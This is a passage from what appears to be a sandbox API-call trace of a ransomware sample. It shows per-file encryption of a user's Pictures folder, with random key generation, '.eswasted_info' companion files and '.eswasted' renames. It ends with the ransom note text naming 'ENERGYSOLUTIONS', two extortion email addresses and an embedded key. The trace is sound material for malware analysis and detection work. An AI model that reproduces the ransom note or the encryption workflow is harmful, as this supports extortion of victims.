(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\6HykKJsYIk6R.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\6hykkjsyik6r.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.113] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.114] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.115] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.115] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.115] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.116] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.116] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.127] SetEndOfFile (hFile=0x110) returned 1 [0081.129] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.129] CloseHandle (hObject=0x110) returned 1 [0081.181] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.181] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.182] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.182] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.182] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\EL1rLnv e3.bmp") returned 116 [0081.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f2) returned 0x4efe18 [0081.183] lstrcpyW (in: lpString1=0x4eff00, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.183] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.183] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.184] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.184] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\EL1rLnv e3.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\el1rlnv e3.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.184] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.186] SetEndOfFile (hFile=0x110) returned 1 [0081.186] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.186] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.186] lstrcpyW (in: lpString1=0x4eff00, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\EL1rLnv e3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\el1rlnv e3.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\EL1rLnv e3.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\el1rlnv e3.bmp.eswasted")) returned 1 [0081.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\EL1rLnv e3.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\el1rlnv e3.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.187] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.188] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.189] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.189] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.189] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.190] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.190] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.200] SetEndOfFile (hFile=0x110) returned 1 [0081.203] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.203] CloseHandle (hObject=0x110) returned 1 [0081.205] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.205] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.206] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.206] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\HkQ_EhdpLvXkublg.png") returned 122 [0081.206] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2fe) returned 0x4efe18 [0081.206] lstrcpyW (in: lpString1=0x4eff0c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.206] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.207] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.207] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.208] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\HkQ_EhdpLvXkublg.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\hkq_ehdplvxkublg.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.208] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.210] SetEndOfFile (hFile=0x110) returned 1 [0081.210] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.210] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.210] lstrcpyW (in: lpString1=0x4eff0c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\HkQ_EhdpLvXkublg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\hkq_ehdplvxkublg.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\HkQ_EhdpLvXkublg.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\hkq_ehdplvxkublg.png.eswasted")) returned 1 [0081.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\HkQ_EhdpLvXkublg.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\hkq_ehdplvxkublg.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.211] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.214] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.215] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.215] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.215] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.216] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.216] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.274] SetEndOfFile (hFile=0x110) returned 1 [0081.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.277] CloseHandle (hObject=0x110) returned 1 [0081.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.279] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.280] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.280] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\rVmTInw.bmp") returned 113 [0081.280] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ec) returned 0x4efe18 [0081.280] lstrcpyW (in: lpString1=0x4efefa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.281] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.281] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.281] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.281] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\rVmTInw.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\rvmtinw.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.282] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.283] SetEndOfFile (hFile=0x110) returned 1 [0081.283] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.284] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.284] lstrcpyW (in: lpString1=0x4efefa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\rVmTInw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\rvmtinw.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\rVmTInw.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\rvmtinw.bmp.eswasted")) returned 1 [0081.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\rVmTInw.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\rvmtinw.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.296] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.299] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.299] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.300] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.300] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.300] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.300] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.310] SetEndOfFile (hFile=0x110) returned 1 [0081.312] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.312] CloseHandle (hObject=0x110) returned 1 [0081.314] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.314] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.315] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.315] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\UuLsXkcC8.bmp") returned 115 [0081.315] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2f0) returned 0x4d91a8 [0081.315] lstrcpyW (in: lpString1=0x4d928e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.315] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.315] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.316] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.316] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\UuLsXkcC8.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\uulsxkcc8.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.317] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.318] SetEndOfFile (hFile=0x110) returned 1 [0081.318] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.318] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.318] lstrcpyW (in: lpString1=0x4d928e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\UuLsXkcC8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\uulsxkcc8.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\UuLsXkcC8.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\uulsxkcc8.bmp.eswasted")) returned 1 [0081.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\UuLsXkcC8.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\uulsxkcc8.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.319] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.352] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.352] CloseHandle (hObject=0x118) returned 1 [0081.352] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef648 [0081.352] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.353] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef690 | out: pbBuffer=0x4ef690) returned 1 [0081.353] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.353] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.354] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.354] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.362] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.362] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.362] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.362] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OHOsfKgmm2/Ve04Tk7UffTblB4Pi7zu3A0ADGRWeWY2LtDJsrsH+CNfD3oC91lzO\r\nG+oiaj0F96IAMdDiU7iM9k/SagZt0PgRm5sTCu5uqFbC+Tb+Av9QNcV0Ytyamn/j\r\n2v7UG4UlgpdCrUzWQaLsOSdA6vXsb/A8IFw3DUhdFwq6iDh0Jld+bCuXU5do9hOQ\r\nBQB4u2Ef/zrvnUtnBjXEdpR9aTa57gZ/XrI1Vn9eavouM1etLbPPJ3OQbDOi/BmY\r\nb/yD3VYI5zXYosWbVcVKJS0viG1O1e9zU7U4ZqUs/L1r855WvuWM+uW4wlstioGX\r\nvhN3QeurCOMcApsgRr1PTc5nqFWnmT/HHKssS6xIt6OPuuwyvFOJTyeYRpUNl5mm\r\n7j6wEVhZ8/q92r2/NH4lqPXKtn6DF4oBNflXOXbOxr/UdffXFzNVTb/vpdlCCaTJ\r\n+1gS7v/W6VAGbYDbmP+jxbyvBEvWsYoJ/EeCsqRJeRthgGNQIbBklyGjU3SH+wTM\r\nfe99boJXc6/mAawpa+dAQKJw037ZdEMty3aaUyOUPYxQaPgWnxETz6k6YIBhmh3C\r\nay4iNooe2r8kugSDlbFeklqwIYgsxYAFcvg6HIvzLyA0nN/OpC/bqxz2bqVpXDWh\r\naUFjgnhKurHjgBEwM5PYYryXkzqv+eQjaUeAQl8uDdw=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.362] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.362] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.363] SetEndOfFile (hFile=0x110) returned 1 [0081.365] HeapFree (in: 